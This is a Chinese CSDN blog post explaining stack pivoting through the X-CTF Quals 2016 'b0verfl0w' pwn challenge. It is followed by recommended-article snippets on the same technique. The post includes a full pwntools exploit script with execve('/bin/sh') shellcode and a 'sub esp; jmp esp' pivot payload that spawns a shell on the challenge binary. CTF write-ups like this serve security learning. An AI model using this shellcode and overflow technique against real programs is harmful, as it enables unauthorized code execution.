X-CTF Quals 2016 - b0verfl0w [Stack Pivoting]

最新推荐文章于 2023-11-17 10:52:33 发布
最新推荐文章于 2023-11-17 10:52:33 发布
阅读量834 收藏
点赞数
分类专栏: CTF之旅 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevin66654/article/details/87180066
版权

学习资料:

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#stack-pivoting

为什么要使用?

(1)栈溢出时,覆盖后剩下的栈空间不够写exp、ROP等溢出利用

(2)开启了PIE,栈地址不固定,没法利用

要求:可以控制EIP或ESP的至少一个,利用gadgets:

pop esp;
sub esp xx,
jmp esp

从而控制程序流到我们的shellcode

例题:

可以控制的字符数为50 - 0x20 - 4 = 14个字节~是不够滴~

就要利用stack pivoting,将esp指向我们填入的buffer的起始地址

shellcode从这儿找

http://shell-storm.org/shellcode/

http://shell-storm.org/shellcode/files/shellcode-841.php

最后得到exp为

#!/usr/bin/env python
# coding=utf-8

from pwn import *
io = process("./b0verfl0w")

shell = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

jmp_esp_addr = 0x8048504
payload = shell + (0x20 - len(shell)) * "A" + "BBBB" + p32(jmp_esp_addr) + asm('sub esp, 0x28;jmp esp')
io.sendline(payload)
io.interactive()

 

Flying_Fatty
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Seccon-CTF-2016-cheer_msg
02-24
样本来自2016年的Seccon ctf的一道pwn题,该题目使用了alloca内存分配函数,该函数不同于一般堆上的内存分配,而是在栈上进行。题解:https://blog.csdn.net/A951860555/article/details/114011564
栈迁移浅析
qq_43409582的博客
11-23 3934
0x00 线下有道栈迁移的题目,因为当时没有好好学,对于栈迁移这一块儿一知半解的,就没出,痛定思痛,在此就好好研究一下。 0x01 前置知识 首先栈迁移就是因为可写空间太小不够rop,就把栈迁移到别的地方去构造payload。 而栈迁移最重要的是两个汇编命令 leave; ret; leave相对于是mov esp,ebp;pop ebp; ret是pop eip; 0x02 stack pivoting 先从32位来理解栈迁移的利用原理。 stack pivoting,正如它所描述的,该技巧就是劫持栈指针
【Writeup】X-CTF Quals 2016_Pwn_b0verfl0w
BAKUMANSEC - Just Do It
09-02 519
0x01 解题思路 查看文件信息   没有开NX,可以向栈上写入shellcode。防护措施只开了一个Partial RELRO,这意味着每次栈加载的地址会变化。 拖入IDA 32 bits查看 main函数里只有一个vuln函数   显然存在栈溢出,但是只能输入50个字节,而填充的padding字段就需要0x20+4=36个字节,再加上EIP,一共40个字节,只有10个字节的shellc...
花式栈溢出技巧----stack pivoting/frame faking
qq_42192672的博客
10-14 1226
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/                   https://www.jianshu.com/p/c53627895330 1.stack pivoting 转移堆  以 X-CTF Quals 2016 - b0verfl0w 为例学习 #若可溢出...
【pwn学习】stack_pivoting
Morphy_Amo的博客
03-07 455
rop、栈劫持
其它栈溢出技巧
听鬼哥说故事
08-29 5898
其它栈溢出技巧
调整栈帧技巧 | 劫持栈指针
Sakura给爷pwn全场
12-12 177
参考链接 https://www.cnblogs.com/ichunqiu/p/11238429.html
Google-CTF-2016-Stego.pcap数据包
10-08
Google-CTF-2016-Stego.pcap数据包
h4ckit-ctf-2016-hex0gator-250 ctf ppc
10-09
题目材料
Internetwache-CTF-2016:Internetwache CTF 2016存储库
05-03
博客文章: ://en.internetwache.org/internetwache-ctf-2016-review-01-03-2016/ 计分板 计分板基于。 有关更多信息,请检查README.tinyctf.md和LICENSE.tinyctf.md 。 您可以在这里找到我们的修改后的分叉: : ...
ppc-h4ckit-ctf-2016-Electronicon - PPC - 250 pts
10-09
ppc-h4ckit-ctf-2016-Electronicon - PPC - 250 pts
pwn调整栈帧的技巧
sea_time的博客
12-05 1072
调整栈帧的技巧 我们在存在栈溢出程序中,经常会碰到一些关于栈的问题,比如开启ASLR导致栈地址不可预测,所能溢出的字节数太少等等。对于这些问题,我们有时候可以通过gadgets来调整栈帧以完成攻击。比如我们所用到的常见手段,包括esp值的加减,利用部分溢出字节来修改ebp的值来进行stack pivoting等。 0x00 扩大栈空间 正常来说,当栈空间不够用时我们是写入bss段中的,那有什么办...
栈迁移(Stack Pivoting)进阶
最新发布
hackzkaq的博客
11-17 164
栈迁移(Stack Pivoting)是一种在漏洞利用中常见的技术,用于改变栈的正常行为,特别是在缓冲区溢出等安全漏洞的情况下。栈迁移的核心在于修改栈指针(如 x86 架构中 ESP 寄存器)的值,使其指向攻击者控制的数据区域。在实际应用中,我们常通过劫持ebp和esp将栈劫持到bss段。在栈迁移十分关键的就是对leave,ret;这段gadget的利用pop ebp;ret == pop eip #弹出栈顶数据给eip寄存器。
关于“gyctf_2020_borrowstack”,涉及栈迁移(pivoting),通用gadge,one_gadget
Probeginner的博客
12-05 277
我们首先给出wp: from pwn import* context.log_level='debug' p=remote('node4.buuoj.cn',26985) elf=ELF('./barop') p_rdi=0x400993 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] read_got=elf.got['read'] lbic=ELF('./libc-2.23.so') p.recvuntil("u!") ```python p.sen
CTF|rop emporium pivot32 writeup (栈迁移题型)
skyattractive的博客
06-13 650
CTF|rop emporium pivot32 writeup (栈迁移题型) 题目来源:https://ropemporium.com/challenge/pivot.html malloc生成了一个堆区 pwnme函数里面有两个gets函数,存在栈溢出的地方,在第二个gets,但是他在填充完s之后所剩下的空间位58-0x28-4,是一个很小的空间,在这样的狭小空间里面是不足以构造rop chain的。 stack pivoting 具有这样特点的题目叫做stack pivotingstack
stack pivoting
fa1c4的blog
04-17 288
概念 控制ESP, EBP控制栈的攻击技术, 将真实程序堆栈转移到伪造堆栈控制执行流. pivot32 通过一个例子学习栈转移的方法 ROPEmporium pivot32题目 依赖动态链接库libpivot32.so 反编译 int __cdecl main(int argc, const char **argv, const char **envp) { char *ptr; // [esp+Ch] [ebp-Ch] setvbuf(_bss_start, 0, 2, 0); put
花式栈溢出技巧之stack pivoting
至臻求学,胸怀云月
02-18 1360
原理 正如它描述的,该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后在相应位置进行ROP。一般来说,我们可能在下述情况使用劫持栈指针。 可以控制栈溢出的字节数较少,难以构造较长的ROP链。 开启了PIE保护,栈地址未知,我们可以将栈劫持到已知的区域。 其他漏洞难以利用,需要进行转换,比如将栈劫持到推空间,从而在堆上写rop及进行堆漏洞利用。 此外,栈指针劫持有以下几个要求: 可以控制程序...
从BUUCTF之ciscn_2019_es_2简单复习栈迁移,即stack pivoting
Probeginner的博客
11-27 1289
简单栈迁移,栈迁移简单
pwn -- pwnable.kr -- simple-login---学习stack pivot
YANG12345_6的博客
12-24 253
在看关于pwn的书时学到了 栈帧劫持stack pivot 利用这个例题练习一下。 基本思想: stack pivot利用到的gadget是在函数退出时需要的两条指令:leave(mov esp,ebp;pop ebp);ret;。这两条指令基本都会有。 可以利用这两条指令,通过栈溢出的方式,实现可以完全控制栈。 stack pivot实现的基本方法 (我的理解 通过栈溢出的方式将 我们之后要实现的完全可控的栈的地址写到EBP的地方 写入之后 ,程序第一次leave;ret;,将写入的地址赋给esp。
x_ctf_b0verfl0w
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值